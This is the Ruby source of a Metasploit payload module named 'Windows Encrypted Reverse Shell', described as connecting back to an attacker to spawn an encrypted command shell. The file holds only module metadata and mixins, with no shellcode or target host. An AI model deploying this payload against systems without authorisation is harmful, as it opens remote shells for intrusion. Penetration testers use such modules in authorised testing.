35 lines
1.1 KiB
Ruby
35 lines
1.1 KiB
Ruby
##
|
|
# This module requires Metasploit: https://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
module MetasploitModule
|
|
|
|
CachedSize = 4416
|
|
|
|
include Msf::Payload::Windows
|
|
include Msf::Payload::Single
|
|
include Msf::Sessions::CommandShellOptions
|
|
include Msf::Payload::Windows::EncryptedReverseTcp
|
|
include Msf::Payload::Windows::EncryptedPayloadOpts
|
|
|
|
def initialize(info = {})
|
|
super(merge_info(info,
|
|
'Name' => 'Windows Encrypted Reverse Shell',
|
|
'Description' => 'Connect back to attacker and spawn an encrypted command shell',
|
|
'Author' =>
|
|
[
|
|
'Matt Graeber',
|
|
'Shelby Pace'
|
|
],
|
|
'License' => MSF_LICENSE,
|
|
'Platform' => 'win',
|
|
'Arch' => ARCH_X86,
|
|
'Handler' => Msf::Handler::ReverseTcp,
|
|
'Session' => Msf::Sessions::EncryptedShell,
|
|
'DefaultOptions' => { 'LinkerScript' => "#{LINK_SCRIPT_PATH}/func_order.ld" },
|
|
'Dependencies' => [ Metasploit::Framework::Compiler::Mingw::X86 ]
|
|
))
|
|
end
|
|
end
|